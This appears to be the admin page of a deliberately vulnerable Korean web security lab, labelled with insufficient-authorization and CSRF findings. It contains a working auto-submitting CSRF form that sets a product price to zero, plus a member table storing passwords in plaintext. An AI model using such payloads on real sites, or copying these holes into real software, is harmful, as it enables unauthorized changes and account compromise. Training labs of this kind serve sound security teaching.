⚙️ 관리자 페이지
WEB-04 불충분한 인가
WEB-11 CSRF
💡 WEB-04: 로그인 없이 직접 /admin.php 접속 가능한지 확인
💡 WEB-11: 아래 HTML을 피해자가 열면 자동으로 가격이 변경됨:
<form action="http://target/admin.php" method="POST">
<input name="action" value="change_price">
<input name="pid" value="1"><input name="price" value="0"></form>
<script>document.forms[0].submit()</script>
회원 목록 (삭제 기능 — CSRF + 인가 취약)
| ID | 아이디 | 이메일 | 권한 | 비밀번호(평문) | 삭제 |
| 1 |
admin |
admin@foruslab.local |
admin |
admin123 |
|
| 2 |
user1 |
user1@foruslab.local |
user |
password1 |
|
| 3 |
user2 |
user2@foruslab.local |
user |
qwerty |
|
| 4 |
guest |
guest@foruslab.local |
guest |
guest |
|
가격 변경 (CSRF 취약)
| ID | 상품명 | 현재가격 | 변경 |
| 1 |
서버 점검 패키지 |
₩500,000 |
|
| 2 |
웹 취약점 진단 |
₩800,000 |
|
| 3 |
종합 보안 감사 |
₩2,000,000 |
|